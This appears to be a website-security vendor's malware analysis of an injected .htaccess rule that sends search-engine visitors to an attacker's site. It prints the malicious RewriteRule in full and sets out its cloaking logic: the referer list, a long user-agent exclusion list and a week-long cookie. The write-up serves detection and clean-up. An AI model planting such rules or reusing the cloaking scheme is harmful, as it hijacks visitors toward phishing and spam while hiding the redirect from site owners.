RewriteRule ^(.*)$   http://url-to-malicious-site.com/cgi-bin/r.cgi?p=10003&i=36c7c8b3&j=333&m=649f84aa2d951f8f26df403fb179cdea&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]

Payload

The execution algorithm can be described as follows.

While Apache is handling an HTTP GET request, IF the visitor's:
  1. Referer is a search engine (see the list below) and is not a cached copy of the page (no "q=cache:" in the Referer),
  2. User-Agent does not contain any of the strings in the table below (the table covers crawlers, feed readers, command-line clients such as curl and wget, and many non-Windows platforms),
  3. Cookie header does not contain the string "xccgtswgokoe",
  4. Request arrived over plain HTTP (%{HTTPS} is "off"),
THEN
  1. Redirect the visitor (302) to "http://url-to-malicious-site.com/cgi-bin/r.cgi?p=10003&i=36c7c8b3&j=333&m=649f84aa2d951f8f26df403fb179cdea", with the original host, request URI, query string and time appended as the h, u, q and t parameters, so the hijacker's server knows exactly which page was requested.
  2. Set the cookie "xccgtswgokoe=1" for the site's host. The CO flag takes name:value:domain:lifetime:path:secure:httponly, so the lifetime of 10080 minutes is seven days, and the cookie is HttpOnly. The same visitor is therefore not redirected again for a week and is far less likely to notice or report anything.

This is also why checking the site with curl or wget, or by typing the address directly, shows nothing wrong: the redirect fires only for a search-engine visitor using an ordinary desktop browser, and only on that visitor's first visit of the week.

List of monitored search engines (the Referer must start with an optional "http://" and an optional host prefix, followed by one of these host fragments; a Referer whose path starts with "/search?" also qualifies):
  1. google.
  2. yahoo.
  3. bing.
  4. msn.
  5. yandex.
  6. ask.
  7. excite.
  8. altavista.
  9. netscape.
  10. aol.
  11. hotbot.
  12. goto.
  13. infoseek.
  14. mamma.
  15. alltheweb.
  16. lycos.
  17. search.
  18. metacrawler.
  19. rambler.
  20. mail.
  21. dogpile.
  22. ya.
  23. /search?


Visitors whose User-Agent contains any of the following strings (matched case-insensitively, [NC]) are NOT redirected:

  1. Accoona
  2. Ace\sExplorer
  3. Amfibi
  4. Amiga\sOS
  5. AppleSyndication
  6. Archive
  7. Argus
  8. Ask\sJeeves
  9. Atrenko\sNews
  10. BeOS
  11. BigBlogZoo
  12. Biz360
  13. Blaiz
  14. BlogPulse
  15. BlogSearch
  16. Bloglines
  17. BlogsLive
  18. BlogsSay
  19. Bookmark
  20. CE\-Preload
  21. CFNetwork
  22. Combine
  23. Crawl
  24. DTAAgent
  25. Danger\shiptop
  26. Diagnostics
  27. EmeraldShield
  28. Evaal
  29. Everest\-Vulcan
  30. Feed
  31. Fetch
  32. FreeBSD
  33. Friendster
  34. Fuck\sYou
  35. Google
  36. Gregarius
  37. HP\-UX
  38. HTML2JPG
  39. HatenaScreenshot
  40. HolyCowDude
  41. Honda\-Search
  42. HttpClient
  43. IRIX
  44. Jakarta
  45. JetBrains
  46. Krugle
  47. Labrador
  48. LeechGet
  49. Liferea
  50. LinkChecker
  51. LinknSurf
  52. Linux
  53. LiveJournal
  54. Lonopono
  55. Lotus\-Notes
  56. Lycos
  57. Lynx
  58. Mac\_PPC
  59. Mac\_PowerPC
  60. Mac\s10
  61. Mediapartners
  62. Megite
  63. MetaProducts
  64. Miva
  65. Mobile
  66. NetBSD
  67. NetNewsWire
  68. NetResearchServer
  69. NewsAlloy
  70. NewsFire
  71. NewsGatorOnline
  72. NewsMacPro
  73. Nokia
  74. NuSearch
  75. Nutch
  76. ObjectSearch
  77. Octora
  78. OmniExplorer
  79. Omnipelagos
  80. Onet
  81. OpenBSD
  82. OpenIntelligenceData
  83. Python
  84. RSS
  85. Rambler
  86. Rojo
  87. SBIder
  88. Scooter
  89. Seeker
  90. Series\s60
  91. SharpReader
  92. SiteBar
  93. Slurp
  94. Snoopy
  95. Soap\sClient
  96. Socialmarks
  97. Sphere\sScout
  98. Straw
  99. SunOS
  100. Surfer
  101. Syndic8
  102. Syntryx
  103. TargetYourNews
  104. Technorati
  105. Thunderbird
  106. Twiceler
  107. Validator
  108. Vienna
  109. W3C
  110. WWWeasel
  111. Wavefire
  112. WebPatrol
  113. Webmaster
  114. Win16
  115. Win95
  116. Win98
  117. WinHTTP
  118. WinNT4
  119. Win\s9x
  120. Windows\s95
  121. Windows\s98
  122. Windows\sCE
  123. Windows\sNT\s4
  124. WordPress
  125. Yahoo
  126. Yandex
  127. Yeti
  128. YouReadMe
  129. Zhuaxia
  130. ZyBorg
  131. apache
  132. appie
  133. asterias
  134. bing
  135. blogWatcher
  136. bot
  137. cococ
  138. curl
  139. ecto
  140. endo
  141. exactseek
  142. findlinks
  143. heritrix
  144. httpunit
  145. iGetter
  146. iPhone
  147. ichiro
  148. larbin
  149. libwww
  150. macDN
  151. oreilly
  152. psycheclone
  153. retriever
  154. spider
  155. sproose
  156. subscriber
  157. urllib
  158. voyager
  159. webcollage
  160. wget
  161. wwwster
  162. yacy


Summary

The hijacked traffic was monetised through blackhat SEO destinations: pills/pharma, phishing, cash loans, pay-per-click providers, bag sales and so on. In short, the attack was designed to hijack search traffic and redirect it to whatever websites the attacker chose.

Website Malware Scanning And Malware Clean-Up


Uncovering online threats and hidden malware is easy and effective with the Online Malware Scanner. If you suspect that your website has been infected, select one of the Malware Removal & Monitoring Plans for malware removal.

Alternatively, you can try to remove such malware yourself using Quttera's website malware scan report and by manually investigating your site's .htaccess file(s). A few important things to remember: use SFTP rather than FTP, take a backup first, change your password(s) and, of course, do not forget to submit your website(s) for re-testing and for removal from the blacklist if needed.